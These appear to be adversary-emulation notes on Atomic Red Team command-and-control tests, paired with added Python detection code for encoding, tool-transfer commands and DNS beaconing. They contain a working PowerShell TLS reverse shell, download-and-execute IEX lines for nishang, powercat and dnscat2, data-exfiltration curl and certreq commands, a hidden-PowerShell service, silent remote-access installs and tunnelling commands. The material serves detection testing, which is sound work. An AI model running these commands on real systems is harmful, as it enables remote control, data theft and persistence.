Atomic - Command and Control tactics
- Technique IDs that are effective in practice and can be written into security policy
- Reference:
- https://atomicredteam.io/atomics/#command-and-control
Overview of the techniques covered
command-and-control
T1573      Encrypted Channel
T1572      Protocol Tunneling
T1571      Non-Standard Port
T1219      Remote Access Software
T1132.001  Data Encoding: Standard Encoding
T1105      Ingress Tool Transfer
T1095      Non-Application Layer Protocol
T1090.003  Proxy: Multi-hop Proxy
T1090.001  Proxy: Internal Proxy
T1071.004  Application Layer Protocol: DNS
T1071.001  Application Layer Protocol: Web Protocols
Host model - Encrypted Channel
1. Build a C2 channel with OpenSSL
C2 = Command and Control. The PowerShell below is the client half of the Atomic test: it opens a TLS session to an OpenSSL listener on the operator host (openssl s_server) and pipes an interactive shell through it. The certificate validation callback always returns $True, so any self-signed certificate is accepted; that, plus the fixed SNI name fakedomain.example, is what to look for. The ART placeholders #{server_ip} and #{server_port} have been replaced with the variables defined at the top so the script runs as written.
$server_ip = '127.0.0.1'
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient($server_ip, $server_port)
$stream = $socket.GetStream()
# Validation callback that accepts every server certificate (no pinning, no chain check)
$sslStream = New-Object System.Net.Security.SslStream($stream, $false, ({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
$writer = New-Object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.Flush()
[byte[]]$bytes = 0..65535 | %{0}
# Read a command from the operator, run it with Invoke-Expression, send back output plus a fresh prompt
while (($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data | Out-String) 2>&1
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $sslStream.Write($sendbyte, 0, $sendbyte.Length)
    $sslStream.Flush()
}
The following command was run together with the script above on this page but is a separate test unrelated to the TLS channel: it registers a service whose binary path launches a hidden PowerShell that creates C:\art-marker.txt.
sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
https://gist.githubusercontent.com/clr2of8/4786587885a7debc576ab44a32fa5cb7/raw/af5827f3169920035da73bc17bc5ec8465b41c59/c2_client_to_openssl_server.ps1
Host model - Protocol Tunneling
1. High volume of queries over DNS over HTTPS
for ($i = 0; $i -le 1000; $i++) { (Invoke-WebRequest "https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=TXT" -UseBasicParsing).Content }
2. Regular beaconing over DNS over HTTPS
Regular beacon: this test simulates an infected host sending periodic beacons to its command-and-control server through DoH queries. The pattern is typical of an implant that is idle and waiting for tasking, or one configured for a low query volume over time to stay under threshold-based detection. -C2Interval sets the base interval between queries and -C2Jitter the percentage of randomisation applied to it.
Set-Location C:\AtomicRedTeam\atomics
.\T1572\src\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
3. Long domain name queries over DNS over HTTPS (the subdomain is a 63-character label, the maximum DNS allows)
Set-Location C:\AtomicRedTeam\atomics
.\T1572\src\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
Host model - Non-Standard Port
1. Test non-standard port usage with PowerShell
Test-NetConnection -ComputerName google.com -port 8081
2. Test non-standard port usage with telnet
echo quit | telnet google.com 8081
exit 0
Host model - Remote Access Software
1. TeamViewer files detected test on Windows (downloads and silently installs TeamViewer, then launches it)
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe"
Start-Process -Wait $file1 /S;
Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'
2. AnyDesk files detected test on Windows (downloads and silently installs AnyDesk)
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe"
Start-Process $file1 /S;
3. LogMeIn files detected test on Windows (downloads and silently installs LogMeIn Ignition, then launches it)
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
$file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi"
Start-Process -Wait $file1 /quiet;
Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' "/S"
4. Install GoToAssist on Windows
Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
Start-Process $file1 /S;
5. Install ScreenConnect on Windows
$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
msiexec /i $installer /qn
6. Run Ammyy Admin on Windows (the binary is staged in %TEMP% by the test prerequisites)
Start-Process $env:temp\ammyy.exe
7. Run RemotePC on Windows (the binary is staged in %TEMP% by the test prerequisites)
Start-Process $env:temp\RemotePC.exe
8. Install NetSupport remote access tool (RAT) on Windows
Start-Process $env:temp\T1219_NetSupport.exe -ArgumentList "/S /v/qn"
9. Install UltraViewer on Windows
Start-Process -Wait -FilePath "$env:temp\T1219_UltraViewer.exe" -Argument "/silent" -PassThru
Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'
10. Run UltraVNC on Windows (launches the installed vncviewer.exe)
Start-Process $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe'
11. Run MSP360 Connect on Windows (launches the installed Connect.exe)
Start-Process $env:ProgramFiles\Connect\Connect.exe
Host model - Data Encoding: Standard Encoding
1. Encode data with Base64
echo -n 111-11-1111 | base64
# -> MTExLTExLTExMTE= ; the encoded value is then sent out as a hostname label
curl -XPOST MTExLTExLTExMTE=.redcanary.com
2. Encode data with XOR
$plaintext = ([System.Text.Encoding]::UTF8.GetBytes("Path\n----\nC:\Users\victim\"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext = @()
# Repeating-key XOR: byte i is XORed with key[i mod key length]
for ($i = 0; $i -lt $plaintext.Count; $i++) {
    $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length]
}
$cyphertext = [System.Text.Encoding]::UTF8.GetString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive
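Added example, not from the page or from Atomic Red Team: the two encodings above in Python together with the defender's side of each. xor_encode and xor_decode reproduce the repeating-key XOR of the PowerShell test with the same key and text; recover_keystream shows why a fixed-key XOR body is recoverable from a little guessed plaintext, which is what separates encoding (T1132) from an encrypted channel (T1573); b64_label and decode_hostname_label reproduce the Base64-in-hostname form of the first test and decode it back, tolerating stripped padding. The sample values are constructed from the tests above.

```python
import base64
from itertools import cycle

# Constructed sample values mirroring the two tests above.
KEY = b"abcdefghijklmnopqrstuvwxyz123456"
SAMPLE = b"Path\n----\nC:\\Users\\victim\\"
SSN_LIKE = b"111-11-1111"


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: byte i is combined with key[i mod len(key)],
    exactly what the PowerShell for-loop does one byte at a time."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR is an involution, so decoding is the same operation."""
    return xor_encode(data, key)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: XOR captured ciphertext with plaintext the
    analyst can guess (a prompt, a 'Path' header, a hostname) and the key bytes
    at those positions fall out. With len(key) known bytes the whole key, and
    so every other message under it, is recovered."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def b64_label(data: bytes) -> str:
    """Standard Base64 as produced by `echo -n ... | base64`. The '=' padding
    and the '+' '/' alphabet are not valid hostname characters, which is one
    reason a label such as MTExLTExLTExMTE=.redcanary.com stands out in logs."""
    return base64.b64encode(data).decode("ascii")


def decode_hostname_label(host: str) -> bytes:
    """Base64-decode the first label of a hostname, restoring padding that a
    tool may have stripped to look less suspicious."""
    label = host.split(".")[0]
    label += "=" * (-len(label) % 4)
    return base64.b64decode(label)


if __name__ == "__main__":
    ct = xor_encode(SAMPLE, KEY)
    print("xor ciphertext:", ct.hex())
    print("decoded:", xor_decode(ct, KEY).decode())
    print("keystream from known 'Path' prefix:", recover_keystream(ct, b"Path"))
    host = b64_label(SSN_LIKE) + ".redcanary.com"
    print(host, "->", decode_hostname_label(host))
```

Because both inputs are plain ASCII, every XOR output byte stays below 0x80, so the PowerShell test's detour through UTF8.GetString happens to be lossless here; with binary plaintext it would not be, and a defender decoding a captured body should work on the raw bytes.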
Host model - Ingress Tool Transfer
- Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
- Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download
- Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file
Ingress tool transfer: the adversary moves tools or files from an external system into the compromised environment. In practice this means bringing anything with upload, download, copy, move or call-back capability onto the victim host to extend the foothold; the transfer of such tooling into the target is what we call ingress tool transfer.
The full list of test cases is at:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md
Common ingress-tool command-line indicators extracted from the tests
rsync scp sftp
(certutil -urlcache)
(certutil -verifyctl)
(bitsadmin.exe /transfer)
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
timeout --preserve-status 1 whois -h localhost -p 443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
finger base64_filedata@#{remote_host}
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
Download
curl -k url -o c:\users\public\music\allthethingsx64.dll
curl -k url --output c:\users\public\music\allthethingsx64.dll
curl -k url -o c:\programdata\allthethingsx64.dll
curl -k url -o %Temp%\allthethingsx64.dll
Upload
curl -T c:\temp\atomictestfile.txt www.example.com
curl --upload-file c:\temp\atomictestfile.txt www.example.com
curl -d c:\temp\atomictestfile.txt www.example.com
curl --data c:\temp\atomictestfile.txt www.example.com
https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat
$machine_list = "$env:temp\T1105MachineList.txt"
$offline_list = "$env:temp\T1105OfflineHosts.txt"
$completed_list = "$env:temp\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
replace.exe
certreq.exe -Post -config https://example.com c:\windows\win.ini %temp%\Atomic-license.txt
wscript.exe PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh; chmod +x atomic.sh; bash atomic.sh
nimgrab.exe
powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile %temp%\Atomic-license.txt
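Added example, not part of the page or of Atomic Red Team: a small command-line matcher in Python that turns the indicators listed above into regular-expression rules and runs them over constructed process-creation events (the Image and CommandLine fields a Sysmon Event ID 1 or Security 4688 record carries). The event records are made up for the example, and the rules are a starting point rather than a tuned rule set; the two benign certutil and curl lines are there to show that the rules key on the download or upload switches, not on the binary name alone.

```python
import re
from os.path import basename

# Rules derived from the command lines listed above: (name, regex over CommandLine).
RULES = [
    ("certutil urlcache download", re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)),
    ("certutil verifyctl download", re.compile(r"certutil(\.exe)?\s.*-verifyctl", re.I)),
    ("bitsadmin transfer", re.compile(r"bitsadmin(\.exe)?\s.*/transfer", re.I)),
    ("Defender MpCmdRun download", re.compile(r"MpCmdRun(\.exe)?\s.*-DownloadFile", re.I)),
    ("IMEWDBLD download", re.compile(r'IMEWDBLD\.exe"?\s+\S*://', re.I)),
    ("PowerShell WebClient download", re.compile(r"Net\.WebClient\).*\.Download(File|String)", re.I)),
    ("PowerShell Invoke-WebRequest to file", re.compile(r"\b(iwr|Invoke-WebRequest)\b.*-OutFile", re.I)),
    ("curl download to writable dir",
     re.compile(r"curl(\.exe)?\s.*(?:-o|--output)\s+\S*(?:\\public\\|\\programdata\\|%temp%\\|\\temp\\)", re.I)),
    ("curl upload", re.compile(r"curl(\.exe)?\s.*(?:-T|--upload-file|-d|--data)\s", re.I)),
    ("certreq POST upload", re.compile(r"certreq(\.exe)?\s.*-Post\s", re.I)),
    ("finger exfil/download", re.compile(r"\bfinger(\.exe)?\s+\S+@\S+", re.I)),
    ("wmic remote process create", re.compile(r"wmic(\.exe)?\s.*/node:.*process\s+call\s+create", re.I)),
]

# Constructed process-creation events (Sysmon 1 / Security 4688 style), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f https://example.com/payload.exe %temp%\p.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",  # benign: hashing, no download switch
     "CommandLine": r"certutil -hashfile C:\Windows\notepad.exe SHA256"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job /download /priority high https://example.com/a.txt C:\Users\Public\a.txt"},
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2103.7-0\MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -DownloadFile -url https://example.com/a.bin -path C:\Users\Public\a.bin"},
    {"Image": r"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe",
     "CommandLine": r'"C:\Windows\System32\IME\SHARED\IMEWDBLD.exe" https://example.com/a.txt'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -c (New-Object Net.WebClient).DownloadFile('https://example.com/a.exe','C:\Users\Public\a.exe')"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -k https://example.com/x.dll -o c:\users\public\music\allthethingsx64.dll"},
    {"Image": r"C:\Windows\System32\curl.exe",  # benign: plain GET, nothing written or uploaded
     "CommandLine": r"curl -s https://example.com/api/status"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -T c:\temp\atomictestfile.txt www.example.com"},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": r'wmic /node: "host2" process call create "regsvr32.exe /i C:\Temp\a.dll"'},
]


def match_events(events):
    """Return [(rule_name, image_basename, command_line)] for every event that
    matches a rule. The first matching rule wins; collect all of them if the
    goal is scoring rather than triage."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["CommandLine"]):
                image = basename(ev["Image"].replace("\\", "/"))
                hits.append((name, image, ev["CommandLine"]))
                break
    return hits


if __name__ == "__main__":
    for name, image, cmd in match_events(SAMPLE_EVENTS):
        print(f"[{name}] {image}: {cmd}")
```

The curl download rule deliberately requires an output path under a world-writable or temp location (the paths used in the tests above); without that qualifier every `curl -o` in a build pipeline would fire. Pair the command-line rules with file-creation events from the same process for lower false-positive rates.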
Host model - Non-Application Layer Protocol
1. ICMP C2
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress 127.0.0.1
2. Netcat C2
cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80
3. Powercat C2
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c 127.0.0.1 -p 80
Host model - Proxy: Multi-hop Proxy
1. Psiphon
PathToAtomicsFolder\T1090.003\src\Psiphon.bat
Indicator: psiphon3.exe
https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat
2. Tor Proxy Usage - Windows
invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'
Start-Sleep -Seconds 60
stop-process -name "tor" | out-null
https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip
3. Tor Proxy Usage - Debian/Ubuntu
sudo apt-get -y install tor   # prerequisite
sudo systemctl start tor
4. Tor Proxy Usage - macOS
# prerequisites: Homebrew, then the tor package
if [ ! -x "$(command -v brew)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"; fi
brew install tor
osascript -e 'tell application "Terminal" to do script "tor"'
Host model - Proxy: Internal Proxy
1. Connection Proxy
export http_proxy=127.0.0.1:8080
unset http_proxy
unset https_proxy
2. Connection Proxy for macOS UI
networksetup -setwebproxy Wi-Fi 127.0.0.1 8080
networksetup -setsecurewebproxy Wi-Fi 127.0.0.1 8080
networksetup -setwebproxystate Wi-Fi off
networksetup -setsecurewebproxystate Wi-Fi off
3. portproxy (the netsh rule persists in the registry under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, which is where to hunt for it)
netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1
netsh interface portproxy delete v4tov4 listenport=1337 | Out-Null   # cleanup
Host model - Application Layer Protocol: DNS
1. High volume of DNS queries
for ($i = 0; $i -le 1000; $i++) { Resolve-DnsName -Type "TXT" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io" -QuickTimeout }
2. Regular DNS beaconing
Set-Location C:\AtomicRedTeam\atomics
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
3. Long domain name DNS queries (63-character label, the DNS maximum)
Set-Location C:\AtomicRedTeam\atomics
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
4. DNS C2
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1
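Added example, not from the page or from Atomic Red Team, covering both the three DoH tests under Protocol Tunneling and the three DNS tests above: detection logic in Python that extracts query names from two constructed log formats (a `name=` field as a resolver or Sysmon DNS-query log carries it, and a proxy line holding a DoH GET to https://8.8.8.8/resolve?name=...) and scores each domain for the three behaviours the tests produce: high-volume random subdomains, a label near the 63-byte limit, and a regular interval with bounded jitter. The log lines, the domain c2-beacon.example and the thresholds are assumptions for the example; the sample sends each behaviour to its own domain so that each shows up in its own group.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Thresholds are assumptions for this example; tune them per environment.
MIN_BEACON_QUERIES = 5
MAX_BEACON_CV = 0.3        # pstdev/mean of inter-query gaps; low = regular interval with jitter
MIN_BEACON_INTERVAL = 5.0  # seconds; faster than this is a burst, not a beacon
MIN_VOLUME = 20
MIN_UNIQUE_RATIO = 0.9     # share of never-repeated names, as Get-Random subdomains produce
MAX_LABEL_LEN = 40         # DNS caps a label at 63; the long-domain tests use exactly 63


def extract_query(line):
    """Return (timestamp, qname) from one log line, or None if it holds no query.
    Handles a resolver/Sysmon-style 'name=' field and a proxy line whose URL is a
    DoH GET such as https://8.8.8.8/resolve?name=...&type=TXT (constructed formats)."""
    parts = line.split()
    if len(parts) < 3:
        return None
    ts = datetime.fromisoformat(parts[0])
    for tok in parts[2:]:
        if tok.startswith("name="):
            return ts, tok[5:].rstrip(".").lower()
        if tok.startswith(("http://", "https://")):
            url = urlsplit(tok)
            names = parse_qs(url.query).get("name")
            if url.path.endswith("/resolve") and names:
                return ts, names[0].rstrip(".").lower()
    return None


def registered_domain(qname):
    """Crude grouping key: the last two labels. Use the Public Suffix List in production."""
    return ".".join(qname.split(".")[-2:])


def analyse(lines):
    """Group queries by domain and return {domain: [reasons]} for the suspicious ones."""
    groups = defaultdict(list)
    for line in lines:
        q = extract_query(line)
        if q:
            groups[registered_domain(q[1])].append(q)
    findings = {}
    for domain, queries in groups.items():
        reasons = []
        names = [n for _, n in queries]
        unique_ratio = len(set(names)) / len(names)
        # Indicator 1: many queries, almost all for never-repeated subdomains
        if len(names) >= MIN_VOLUME and unique_ratio >= MIN_UNIQUE_RATIO:
            reasons.append(f"high-volume random subdomains ({len(names)} queries, {unique_ratio:.0%} unique)")
        # Indicator 2: a label near the 63-byte limit (data or padding stuffed into the name)
        longest = max(len(label) for n in names for label in n.split("."))
        if longest >= MAX_LABEL_LEN:
            reasons.append(f"long label ({longest} chars)")
        # Indicator 3: regular inter-query gap with small jitter (C2Interval +/- C2Jitter)
        times = sorted(t for t, _ in queries)
        if len(times) >= MIN_BEACON_QUERIES:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mean = statistics.mean(gaps)
            cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
            if mean >= MIN_BEACON_INTERVAL and cv <= MAX_BEACON_CV:
                reasons.append(f"periodic beacon (~{mean:.0f}s interval, cv={cv:.2f})")
        if reasons:
            findings[domain] = reasons
    return findings


# Constructed sample log; c2-beacon.example is a made-up name, the rest mirror the tests.
_T0 = datetime.fromisoformat("2024-05-01T12:00:00")


def _ts(seconds):
    return (_T0 + timedelta(seconds=seconds)).isoformat()


SAMPLE_LOG = (
    # DoH beacon every ~30 s with ~20 % jitter, as the T1572 beacon test produces (proxy log)
    [f"{_ts(s)} proxy GET https://8.8.8.8/resolve?name=atomicredteam.c2-beacon.example&type=TXT"
     for s in (0, 31, 58, 92, 120, 147, 178, 210)]
    # burst of random-subdomain TXT queries (high-volume tests)
    + [f"{_ts(i // 10)} dns query type=TXT name=atomicredteam.{100000 + i * 7919}.127.0.0.1.xip.io"
       for i in range(40)]
    # one 63-character label (long-domain tests)
    + [f"{_ts(400)} dns query type=TXT name={'atomicredteam' * 4}atomicredte.127.0.0.1.xip.io"]
    # benign background traffic
    + [f"{_ts(500)} dns query type=A name=www.example.com",
       f"{_ts(900)} dns query type=A name=www.example.com"]
)

if __name__ == "__main__":
    for domain, reasons in analyse(SAMPLE_LOG).items():
        print(f"{domain}: " + "; ".join(reasons))
```

The DoH variant is only visible at the proxy or in TLS/SNI metadata, never in the stub resolver's log, which is why the parser accepts both sources; a beacon that spaces its queries more widely than the observation window, or that randomises the interval beyond the cv threshold, will evade this check and needs a longer baseline.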
Host model - Application Layer Protocol: Web Protocols
1. Send known-malicious User-Agent strings with PowerShell
Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
2. Send known-malicious User-Agent strings from CMD
curl -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1
curl -s -A "*<|>*" -m3 www.google.com >nul 2>&1
3. Send known-malicious User-Agent strings from Linux
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com